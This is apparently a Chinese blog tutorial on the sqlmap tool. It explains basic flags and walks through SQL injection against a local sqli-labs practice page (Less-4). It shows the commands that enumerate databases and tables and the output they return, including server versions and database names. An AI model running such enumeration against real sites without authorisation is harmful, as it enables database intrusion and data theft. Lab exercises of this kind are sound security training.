0x01 命令讲解
-h 基本的帮助信息
-hh 详细的帮助信息
-u 指定url
--dbs 获取当前数据库的所有数据库
--batch 所有的选项都选择默认
-D 选中某个数据库
--tables 获取选中的数据库下的所有数据表名0x02 实战讲解
0x02.1 获取所有数据库名
以下基于sql-labs的Less04讲解
点击我传送到判断当前注入类型的方法 这里不再讲解
sqlmap.py -u 'http://localhost/sql/Less-4/?id=1")' --dbs --batch
--dbs 获取所有数据库名
--batch 所有的选项都选择默认
根据结果我们可以看到它我们的url中存在报错注入(error-based)和时间盲注(time-based blind)
获取的信息
web服务器中间件为Apache其版本为2.4.48
PHP版本为5.6.40
Mysql数据库版本为 5.6
并且获取到了mysql数据库中的所有数据库名
available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys
[*] wordpress0x02.2 获取数据库的数据表
sqlmap.py -u 'http://localhost/sql/Less-4/?id=1")' --batch -D dvwa --tables
-D 指定数据库名
--tables 获取指定数据库名下的所有数据表
如果不使用-D指定某个数据库的情况下,可以使用--dbs配合--tables 获取所有数据库下的所有数据表运行结果
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+本文作者为blog,转载请注明。
